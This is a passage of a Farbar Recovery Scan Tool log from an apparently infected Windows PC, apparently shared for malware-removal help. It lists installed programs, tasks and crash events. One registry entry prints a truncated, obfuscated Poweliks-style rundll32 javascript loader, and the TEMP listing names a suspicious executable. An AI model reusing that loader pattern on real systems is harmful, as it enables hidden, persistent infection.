C:\Users\Public\Desktop\Google Chrome.lnk</p><p>2014-11-25 01:39 - 2014-06-08 18:36 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Youtube Downloader HD</p><p>2014-11-25 01:38 - 2014-06-08 18:23 - 00001153 _____ () C:\Users\johnsmith\Desktop\Youtube Downloader HD.lnk</p><p>2014-11-25 01:38 - 2014-06-08 18:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader HD</p><p>2014-11-25 01:38 - 2014-06-08 18:23 - 00000000 ____D () C:\Program Files (x86)\Youtube Downloader HD</p><p>2014-11-24 09:27 - 2013-01-25 11:22 - 00000000 ____D () C:\Users\johnsmith\Documents\Calibre Library</p><p>2014-11-23 08:56 - 2014-02-10 11:26 - 00000000 ____D () C:\Users\johnsmith\Desktop\books to load</p><p>2014-11-20 09:59 - 2013-02-15 21:16 - 00000000 ____D () C:\Users\johnsmith\AppData\Local\QuickPar</p><p>2014-11-19 14:35 - 2013-01-29 23:17 - 00001891 _____ () C:\Users\johnsmith\Desktop\Mirc searches.txt</p><p>2014-11-19 14:20 - 2013-01-24 23:03 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\mIRC</p><p>2014-11-19 14:13 - 2013-02-14 23:18 - 00000000 ____D () C:\Users\johnsmith\Documents\My Kindle Content</p><p>2014-11-19 13:39 - 2014-10-10 20:59 - 00000273 _____ () C:\Users\johnsmith\Desktop\Monthly Finances.txt</p><p>2014-11-14 15:30 - 2014-05-08 13:10 - 00003900 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA</p><p>2014-11-14 15:30 - 2014-05-08 13:10 - 00003664 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore</p><p>2014-11-13 18:16 - 2013-01-27 22:53 - 00001701 _____ () C:\Users\johnsmith\Desktop\IMDB.url</p><p>2014-11-11 04:53 - 2014-07-01 15:43 - 00000000 ____D () C:\Users\johnsmith\Desktop\Nicole's New Job Search</p><p>2014-11-09 09:23 - 2014-04-29 09:48 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\HandBrake</p><p>2014-11-07 10:05 - 2013-09-06 09:47 - 00000000 ____D () C:\Windows\Minidump</p><p>2014-11-06 11:33 - 2013-01-24 21:18 - 00000000 ____D () C:\Users\johnsmith</p><p></p><p>Some content 
of TEMP:</p><p>====================</p><p>C:\Users\johnsmith\AppData\Local\Temp\syserrfix.exe</p><p></p><p></p><p>==================== Bamital & volsnap Check =================</p><p></p><p>(There is no automatic fix for files that do not pass verification.)</p><p></p><p>C:\Windows\System32\winlogon.exe => File is digitally signed</p><p>C:\Windows\System32\wininit.exe => File is digitally signed</p><p>C:\Windows\explorer.exe => File is digitally signed</p><p>C:\Windows\SysWOW64\explorer.exe => File is digitally signed</p><p>C:\Windows\System32\svchost.exe => File is digitally signed</p><p>C:\Windows\SysWOW64\svchost.exe => File is digitally signed</p><p>C:\Windows\System32\services.exe => File is digitally signed</p><p>C:\Windows\System32\User32.dll => File is digitally signed</p><p>C:\Windows\SysWOW64\User32.dll => File is digitally signed</p><p>C:\Windows\System32\userinit.exe => File is digitally signed</p><p>C:\Windows\SysWOW64\userinit.exe => File is digitally signed</p><p>C:\Windows\System32\rpcss.dll => File is digitally signed</p><p>C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed</p><p></p><p></p><p>LastRegBack: 2014-11-23 23:14</p><p></p><p>==================== End Of Log ============================</p><p></p><p></p><p>Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2014 01</p><p>Ran by johnsmith at 2014-11-30 21:08:19</p><p>Running from C:\Users\johnsmith\Desktop</p><p>Boot Mode: Normal</p><p>==========================================================</p><p></p><p></p><p>==================== Security Center ========================</p><p></p><p>(If an entry is included in the fixlist, it will be removed.)</p><p></p><p>AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}</p><p>AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}</p><p></p><p>==================== Installed Programs ======================</p><p></p><p>(Only the adware programs with 
"hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)</p><p></p><p>4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)</p><p>Adobe Reader XI (11.0.01) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.01 - Adobe Systems Incorporated)</p><p>Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.)</p><p>Amazon Kindle (HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Amazon Kindle) (Version: - Amazon)</p><p>ArcSoft Panorama Maker 6 (HKLM-x32\...\{E9CBC8FA-BF1F-4956-8B75-0D314682FE5F}) (Version: 6.0.0.92 - ArcSoft)</p><p>AuthenTec TrueAPI 64-bit (Version: 1.6.0.86 - AuthenTec, Inc.) Hidden</p><p>Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Binreader (HKLM-x32\...\{3D47B2C0-8748-4450-99AE-0746A5A74C8E}) (Version: 1.0.0 - Binreader)</p><p>Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)</p><p>Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>calibre 64bit (HKLM\...\{0F072A3A-7D6F-4CE0-AB44-10DB3A7B3852}) (Version: 1.17.0 - Kovid Goyal)</p><p>Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>Classic Shell (HKLM\...\{CB00799C-0E4F-4FD1-A046-BD24321BCDFF}) (Version: 3.6.5 - IvoSoft)</p><p>Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5407 - CyberLink Corp.)</p><p>CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)</p><p>CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{4862344A-A39C-4897-ACD4-A1BED5163C5A}) 
(Version: 2.0.1.3119 - CyberLink Corp.)</p><p>CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1926 - CyberLink Corp.)</p><p>CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.1.1925 - CyberLink Corp.)</p><p>CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)</p><p>CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)</p><p>D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden</p><p>Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)</p><p>Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden</p><p>Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Free Alarm Clock 2.7.1 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 2.7 - Comfort Software Group)</p><p>Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.71 - Google Inc.)</p><p>Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) 
Hidden</p><p>Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>HandBrake 0.9.9.1 (HKLM-x32\...\HandBrake) (Version: 0.9.9.1 - )</p><p>Hard Disk Scrubber 3.4 (Remove Only) (HKLM-x32\...\{DE47ADD1-B82B-4B52-AF29-76AE7EF4E19D}_is1) (Version: - Summit Computer Networks, Inc.)</p><p>HDR Efex Pro 2 (HKLM-x32\...\HDR Efex Pro 2) (Version: 2.0.0.0 - Nik Software, Inc.)</p><p>Hewlett-Packard ACLM.NET v1.2.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden</p><p>Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>HP 3D DriveGuard (HKLM\...\{F244D07D-1876-4CDD-914D-214E15A8D327}) (Version: 4.2.5.1 - Hewlett-Packard Company)</p><p>HP Connected Backup (HKLM-x32\...\{6BA5F6E7-6CC1-4117-816D-A549A06CE44E}) (Version: 8.7.0.0 - Autonomy)</p><p>HP Connected Music (Meridian - installer) (HKLM-x32\...\StartHPConnectedMusic) (Version: v1.0 - Meridian Audio Ltd)</p><p>HP CoolSense (HKLM-x32\...\{16B7BDA1-B967-4D2D-8B27-E12727C28350}) (Version: 2.10.3 - Hewlett-Packard Company)</p><p>HP Documentation (HKLM-x32\...\{0EF47DBD-7E67-492F-9423-DAF028BEF627}) (Version: 1.1.0.0 - Hewlett-Packard)</p><p>HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent)</p><p>HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company)</p><p>HP Quick Launch (HKLM-x32\...\{609B11CC-8CED-4116-AD8A-A72168894D39}) (Version: 3.0.4 - Hewlett-Packard Company)</p><p>HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)</p><p>HP SimplePass (HKLM-x32\...\{34C821CA-6B55-44A0-8A9B-2EF471D6019E}) (Version: 6.0.100.244 - Hewlett-Packard)</p><p>HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company)</p><p>HP Support Assistant (HKLM-x32\...\{B8019B54-F9BE-490A-9619-6D06F18F129F}) (Version: 7.0.32.44 - Hewlett-Packard Company)</p><p>HP Utility Center 
(HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)</p><p>HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.5.1 - Hewlett-Packard Company)</p><p>IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6417.0 - IDT)</p><p>Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)</p><p>Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)</p><p>Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2817 - Intel Corporation)</p><p>Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)</p><p>Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)</p><p>Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)</p><p>Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)</p><p>Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft 
Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{4FFA2088-8317-3B14-93CD-4C699DB37843}) (Version: 9.0.30729 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)</p><p>mIRC (HKLM-x32\...\mIRC) (Version: 7.22 - mIRC Co. Ltd.)</p><p>Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Mystery P.I. 
- Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Nero 12 (HKLM-x32\...\{560FC78C-A4B2-461D-9B47-820C1EEF87B8}) (Version: 12.0.02000 - Nero AG)</p><p>PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden</p><p>Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Perfect Resize 7.0.1 Professional Edition (HKLM-x32\...\{FCADA4FF-142C-42A8-B73C-0A54A7F83345}) (Version: 7.0.1 - onOne Software)</p><p>Photomatix Pro version 4.2.4 (HKLM\...\PhotomatixPro42x64_is1) (Version: 4.2.4 - HDRsoft Sarl)</p><p>Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden</p><p>Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden</p><p>Privacy Eraser (HKLM\...\{CB5AC03C-B8AD-980F-998E-51969A6DFC9F}_is1) (Version: 2.8.0.639 - Cybertron Software Co., Ltd.)</p><p>Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink)</p><p>Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek)</p><p>Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.27025 - Realtek Semiconductor Corp.)</p><p>Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Silver Efex Pro 2 (HKLM-x32\...\Silver Efex Pro 2) (Version: 2.0.0.0 - Nik Software, Inc.)</p><p>Skype™ 6.16 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.16.105 - Skype Technologies S.A.)</p><p>swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden</p><p>Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.10.12 - Synaptics Incorporated)</p><p>Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden</p><p>Tixati (HKLM-x32\...\tixati) (Version: - )</p><p>TreeSize Free V2.7 (HKLM-x32\...\TreeSize Free_is1) (Version: 2.7 - JAM 
Software)</p><p>Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden</p><p>Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.)</p><p>VC 9.0 Runtime (x32 Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden</p><p>VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)</p><p>Welcome App (Start-up experience) (x32 Version: 12.0.14000 - Nero AG) Hidden</p><p>WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)</p><p>WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden</p><p>Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)</p><p>WinRAR 4.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)</p><p>Youtube Downloader HD v. 2.9.9.16.2 (HKLM-x32\...\Youtube Downloader HD_is1) (Version: - YoutubeDownloaderHD.com)</p><p>Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p></p><p>==================== Custom CLSID (selected items): ==========================</p><p></p><p>(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)</p><p></p><p>CustomCLSID: HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). 
<==== Poweliks?</p><p></p><p>==================== Restore Points =========================</p><p></p><p>29-11-2014 19:44:30 Scheduled Checkpoint</p><p></p><p>==================== Hosts content: ==========================</p><p></p><p>(If needed Hosts: directive could be included in the fixlist to reset Hosts.)</p><p></p><p>2012-07-25 22:26 - 2012-07-25 22:26 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts</p><p></p><p>==================== Scheduled Tasks (whitelisted) =============</p><p></p><p>(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)</p><p></p><p>Task: {44887619-6412-414B-896F-45E47A0080D8} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)</p><p>Task: {5EBFA391-93A2-42F0-8C59-966AFE87038F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-08] (Google Inc.)</p><p>Task: {5ED0D22D-A9B4-4852-A748-30F6CA9CC9C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-08-10] (Hewlett-Packard Company)</p><p>Task: {727E8D00-4042-4C2E-9218-079ECF9F7AE1} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2012-08-24] (Synaptics Incorporated)</p><p>Task: {72E3FF20-73DF-437C-BF3D-0A8F3877FD7A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-08] (Google Inc.)</p><p>Task: {8F075D28-AFF0-4171-AED6-C76737CC070C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2012-08-07] (Hewlett-Packard Company)</p><p>Task: {B3D38C21-AAA2-49A7-956D-33969C76338A} - System32\Tasks\Cybertron\Privacy Eraser\SkipUAC => C:\Program Files\Cybertron\Privacy 
Eraser\PrivacyEraser.exe [2014-06-16] (Cybertron Software, Co., Ltd.)</p><p>Task: {DAFF4139-76A3-4C78-8758-708F3D7C2C2D} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</p><p></p><p>==================== Loaded Modules (whitelisted) =============</p><p></p><p>2013-01-25 11:54 - 2011-03-02 10:40 - 00164864 _____ () C:\Program Files\WinRAR\rarext.dll</p><p>2012-09-06 02:47 - 2012-09-06 02:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe</p><p>2012-08-10 02:36 - 2012-08-10 02:36 - 04073320 _____ () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe</p><p>2012-07-28 08:31 - 2012-07-28 08:31 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll</p><p>2012-11-21 00:32 - 2012-06-07 20:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll</p><p>2012-06-08 12:34 - 2012-06-08 12:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll</p><p>2012-11-21 00:15 - 2012-06-25 11:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll</p><p></p><p>==================== Alternate Data Streams (whitelisted) =========</p><p></p><p>(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)</p><p></p><p>AlternateDataStreams: C:\Windows:nlsPreferences</p><p></p><p>==================== Safe Mode (whitelisted) ===================</p><p></p><p>(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)</p><p></p><p></p><p>==================== EXE Association (whitelisted) =============</p><p></p><p>(If an entry is included in the fixlist, the default will be restored. 
None default entries will be removed.)</p><p></p><p></p><p>==================== MSCONFIG/TASK MANAGER disabled items =========</p><p></p><p>(Currently there is no automatic fix for this section.)</p><p></p><p>HKLM\...\StartupApproved\Run32: => "SwitchBoard"</p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\StartupApproved\Run: => "FreeAC"</p><p></p><p>========================= Accounts: ==========================</p><p></p><p>Administrator (S-1-5-21-2762839642-1568754923-376086736-500 - Administrator - Disabled)</p><p>Guest (S-1-5-21-2762839642-1568754923-376086736-501 - Limited - Disabled)</p><p>johnsmith (S-1-5-21-2762839642-1568754923-376086736-1001 - Administrator - Enabled) => C:\Users\johnsmith</p><p></p><p>==================== Faulty Device Manager Devices =============</p><p></p><p></p><p>==================== Event log errors: =========================</p><p></p><p>Application errors:</p><p>==================</p><p>Error: (11/30/2014 09:07:26 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5094a012</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x9e8</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 09:05:22 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a5b9</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 
0x1c54</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 08:35:11 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe, version: 1.2.3.4, time stamp: 0x2a425e19</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x0002076b</p><p>Faulting process id: 0xafc</p><p>Faulting application start time: 0x{d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe0</p><p>Faulting application path: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe1</p><p>Faulting module path: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe2</p><p>Report Id: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe3</p><p>Faulting package full name: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe4</p><p>Faulting package-relative application ID: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe5</p><p></p><p>Error: (11/30/2014 08:09:43 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x50109de9</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x1564</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 08:09:35 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: 
iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a862</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x0002fb1e</p><p>Faulting process id: 0x510</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 07:49:08 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time stamp: 0x50109cce</p><p>Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x034731a0</p><p>Faulting process id: 0xd70</p><p>Faulting application start time: 0xpowershell.exe0</p><p>Faulting application path: powershell.exe1</p><p>Faulting module path: powershell.exe2</p><p>Report Id: powershell.exe3</p><p>Faulting package full name: powershell.exe4</p><p>Faulting package-relative application ID: powershell.exe5</p><p></p><p>Error: (11/30/2014 07:49:02 PM) (Source: .NET Runtime) (EventID: 1026) (User: )</p><p>Description: Application: powershell.exe</p><p>Framework Version: v4.0.30319</p><p>Description: The process was terminated due to an unhandled exception.</p><p>Exception Info: System.AccessViolationException</p><p>Stack:</p><p> at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)</p><p> at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, 
